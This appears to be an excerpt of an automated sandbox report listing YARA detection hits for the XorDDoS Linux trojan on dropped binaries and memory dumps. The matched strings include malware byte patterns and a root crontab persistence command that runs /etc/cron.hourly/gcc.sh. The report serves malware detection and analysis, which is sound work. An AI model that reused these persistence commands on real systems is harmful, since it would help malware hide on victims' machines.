0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/zfzhrlhjxr	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/wobaryykiz	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/zfzhrlhjxr	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/tgdthymawi	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/tgdthymawi	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/tgdthymawi	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/tgdthymawi	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/tgdthymawi	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/tgdthymawi	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/tgdthymawi	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/tgdthymawi	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/gcfolkfaec	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/gcfolkfaec	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/gcfolkfaec	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/gcfolkfaec	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/gcfolkfaec	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/gcfolkfaec	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/gcfolkfaec	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/gcfolkfaec	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/mbeioyodii	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/mbeioyodii	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/mbeioyodii	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/mbeioyodii	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/mbeioyodii	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/mbeioyodii	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/mbeioyodii	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/mbeioyodii	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/drdxrfohux	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/drdxrfohux	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/drdxrfohux	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/drdxrfohux	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/drdxrfohux	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/drdxrfohux	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/drdxrfohux	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/drdxrfohux	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/doxgrgkpoa	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/doxgrgkpoa	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/doxgrgkpoa	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/doxgrgkpoa	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/doxgrgkpoa	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/doxgrgkpoa	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/doxgrgkpoa	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/doxgrgkpoa	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Click to see the 106 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6210.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6210.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6210.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6210.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6210.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6210.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6210.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6397.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6397.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6397.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6397.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6397.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6397.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6397.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6417.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6417.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6417.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6417.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6417.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6417.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6417.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6394.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6394.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6394.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6394.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6394.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
